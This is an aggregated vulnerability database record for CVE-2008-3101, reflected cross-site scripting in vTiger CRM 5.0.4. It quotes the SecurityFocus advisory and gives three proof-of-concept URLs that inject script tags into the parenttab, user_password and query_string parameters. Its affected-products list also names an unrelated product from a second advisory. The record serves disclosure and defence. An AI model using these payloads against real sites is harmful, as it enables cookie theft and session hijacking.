ID

VAR-E-200809-0436


CVE

cve_id:CVE-2008-3101

Trust: 2.7

sources: BID: 30951 // BID: 31055 // PACKETSTORM: 69548 // EXPLOIT-DB: 32307 // EDBNET: 53849

EDB ID

32307


TITLE

vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 32307

DESCRIPTION

vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities. CVE-2008-3101, CVE-47865. Webapps exploit for PHP platform.

Trust: 0.6

sources: EXPLOIT-DB: 32307

AFFECTED PRODUCTS

vendor: vtiger, model: crm, scope: eq, version: 5.0.4

Trust: 1.9

vendor: hypersilence, model: silentum loginsys, scope: eq, version: 1.0

Trust: 0.3

sources: BID: 30951 // BID: 31055 // EXPLOIT-DB: 32307 // EDBNET: 53849

EXPLOIT

source: https://www.securityfocus.com/bid/30951/info

vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

vtiger CRM 5.0.4 is vulnerable; other versions may also be affected.

http://www.example.com/vtigercrm/index.php?module=Products&action=index&parenttab="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Users&action=Authenticate&user_password="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="><script>alert(1);</script>

Trust: 1.0

sources: EXPLOIT-DB: 32307

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 32307

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 32307

TYPE

Multiple Cross-Site Scripting Vulnerabilities

Trust: 1.6

sources: EXPLOIT-DB: 32307 // EDBNET: 53849

TAGS

tag:exploit

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:xss

Trust: 0.5

sources: PACKETSTORM: 69548

CREDITS

Fabian Fingerle

Trust: 0.6

sources: EXPLOIT-DB: 32307

EXTERNAL IDS

db: NVD, id: CVE-2008-3101

Trust: 3.3

db: BID, id: 30951

Trust: 1.9

db: EXPLOIT-DB, id: 32307

Trust: 1.6

db: EDBNET, id: 70477

Trust: 0.6

db: EDBNET, id: 53849

Trust: 0.6

db: PACKETSTORM, id: 69548

Trust: 0.5

db: BID, id: 31055

Trust: 0.3

sources: BID: 30951 // BID: 31055 // PACKETSTORM: 69548 // EXPLOIT-DB: 32307 // EDBNET: 70477 // EDBNET: 53849

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2008-3101

Trust: 2.1

url:https://www.securityfocus.com/bid/30951/info

Trust: 1.0

url:https://www.intelligentexploit.com

Trust: 0.6

url:https://www.exploit-db.com/exploits/32307/

Trust: 0.6

url:http://www.vtiger.de/vtiger-crm/downloads/patches.html?tx_abdownloads_pi1[action]=getviewdetailsfordownload&tx_abdownloads_pi1[uid]=128&tx_abdownloads_pi1[category_uid]=5&chash=e16be773a5

Trust: 0.3

url:http://hypersilence.net/silentum_loginsys.php

Trust: 0.3

sources: BID: 30951 // BID: 31055 // PACKETSTORM: 69548 // EXPLOIT-DB: 32307 // EDBNET: 70477 // EDBNET: 53849

SOURCES

db: BID, id: 30951
db: BID, id: 31055
db: PACKETSTORM, id: 69548
db: EXPLOIT-DB, id: 32307
db: EDBNET, id: 70477
db: EDBNET, id: 53849

LAST UPDATE DATE

2022-07-27T09:50:41.853000+00:00


SOURCES UPDATE DATE

db: BID, id: 30951, date: 2008-09-01T00:00:00
db: BID, id: 31055, date: 2008-09-09T17:11:00

SOURCES RELEASE DATE

db: BID, id: 30951, date: 2008-09-01T00:00:00
db: BID, id: 31055, date: 2008-09-06T00:00:00
db: PACKETSTORM, id: 69548, date: 2008-09-03T02:42:07
db: EXPLOIT-DB, id: 32307, date: 2008-09-01T00:00:00
db: EDBNET, id: 70477, date: 2008-09-02T00:00:00
db: EDBNET, id: 53849, date: 2008-09-01T00:00:00